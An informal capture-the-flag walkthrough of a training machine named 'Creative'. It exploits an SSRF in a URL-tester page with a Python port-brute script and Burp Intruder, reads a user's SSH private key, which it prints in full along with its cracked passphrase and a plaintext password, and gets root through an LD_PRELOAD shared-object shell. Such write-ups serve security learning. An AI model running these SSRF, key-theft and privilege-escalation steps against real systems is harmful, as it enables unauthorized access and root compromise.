Creative

Creative

did a nmap scan……

saw ssh port 22 open

put “10.10.161.74 creative.thm” in sudo nano /etc/hosts

did a gobuster scan because robots.txt or the source page doesn’t have anything juicy

gobuster vhost -u <http://creative.thm/> -w /usr/share/wordlists/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 40

we found a beta.creative.thm

in sudo nano /etc/hosts we add “10.10.161.74 beta.creative.thm”

in the firefox we searched for beta.creative.thm and found a url tester page

The URL Tester Works!!!!!!

It gives Dead when we search for Google (because THM machines don’t have access to Google)

also when we host our own server using

python -m http.server 80

and access via URL tester as http://<mcn ip>/test.html

we get the contents of the test file

This might lead to SSRF attack

SSRF vulnerabilities typically arise when an application accepts user input and uses it to construct a URL for making HTTP requests without proper validation or sanitization. For example:

• A web application allows users to specify a URL to fetch data from and then uses that URL to make a request. If the application does not validate the input properly, an attacker could provide a URL that points to an internal service.

Server-Side Request Forgery (SSRF) is a type of security vulnerability that allows an attacker to send crafted requests from a vulnerable server to internal or external resources. In an SSRF attack, the attacker manipulates the server into making requests to unintended locations, which can lead to various security issues

made a python file

import requests
import urllib.parse
from concurrent.futures import ThreadPoolExecutor

def send_post_request(url, payload, headers):
    try:
        response = requests.post(url, data=payload, headers=headers)
        content_length = response.headers.get('Content-Length')
        if content_length != '13':  # Check if content length isn't 13
            print(f"POST request to {url} with payload {payload} returned status code: {response.status_code}, content length: {content_length}")
    except requests.exceptions.RequestException as e:
        print(f"Error sending POST request: {e}")
def main():
    base_url = "<http://beta.creative.thm>"
    headers = {
        "Host": "beta.creative.thm",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "<http://beta.creative.thm>",
        "Connection": "close",
        "Referer": "<http://beta.creative.thm/>",
        "Upgrade-Insecure-Requests": "1"
    }
    # Using ThreadPoolExecutor to run 20 threads concurrently
    with ThreadPoolExecutor(max_workers=20) as executor:
        for port_number in range(1, 65536):
            url = f"<http://localhost>:{port_number}"
            payload = f"url=http%3A%2F%2Flocalhost%3A{port_number}"
            executor.submit(send_post_request, base_url, payload, headers)
if __name__ == "__main__":
    main()

and run it as python portbrute.py

or use BurpSuite on Intruder mode

turn on the proxy and intercept

enter in the website http://127.0.0.1:80/

we get

§POST / HTTP/1.1

Host: beta.creative.thm

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

Origin: [http://beta.creative.thm](http://beta.creative.thm/)

Connection: close

Referer: http://beta.creative.thm/

Upgrade-Insecure-Requests: 1

url=http%3A%2F%2F10.10.49.236§

ctrl+a → ctrl+i

change the url=127.0.0.1:§80§/

go to payloads section(generate a payload list in the pentesters gpt using the prompt “can you give me top ports in new-line so that i can paste it in the payload section of Burpsuite”)

paste the list in the payload window go back to the Intruder and “start Attack”

on port 1337 we get a status:200

now put http://127.0.0.1:1337/ and intercept that

Send that to Repeater

in the url=http%3a%2f%2f127.0.0.1%3a80%2f select “http%3a%2f%2f127.0.0.1%3a1337%2f” in the decoded form add “http://127.0.0.1:1337/” paste the encoded text as

url=http%3a%2f%2f127.0.0.1%3a1337%2f and send it

status 200 achieved

now again encode “http://127.0.0.1:1337/home”

we get a name saad

“http://127.0.0.1:1337/home/saad/” encode and send

we get .ssh

“http://127.0.0.1:1337/home/saad/.ssh/”

we get id_rsa

“http://127.0.0.1:1337/home/saad/.ssh/id_rsa/” encode and send

we get the private key

— — BEGIN OPENSSH PRIVATE KEY — — — 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 ksrXEYjaMdndnvxBZ0zi9T+ywag= — — -END OPENSSH PRIVATE KEY — — -

save as id_rsa in text

<aside> 💡

add one line at the end to prevent “authentication error”

</aside>

sudo chmod 600 id_rsa

ssh -i id_rso saad@10.10.73.100 “It says it is protected so we use john”

ssh2john id_rso > hash

found it !!!!!!!!!!!!!!! sweetness (id_rsa)

ssh -i id_rsa saad@10.10.73.100 ………………. now when it asks for passkey enter “sweetness”

cat .bash_history

password is in

echo “saad:MyStrongestPasswordYet$4291” > creds.txt rm creds.txt

password is MyStrongestPasswordYet$4291

saad@m4lware:~$ sudo -l
[sudo] password for saad: 
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,
    env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping

search for LD_PRELOAD priv esc and find out this code

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

then in cd /tmp/ create a temporary file like nano shell.c and paste the above code

then run gcc -fPIC -shared -o shell.so shell.c -nostartfiles

then run sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping

sudo access granted!!!!!!!!!!

cat root.txt

cat /home/saad/user.txt

Kistimaat!!!!!!!!!!!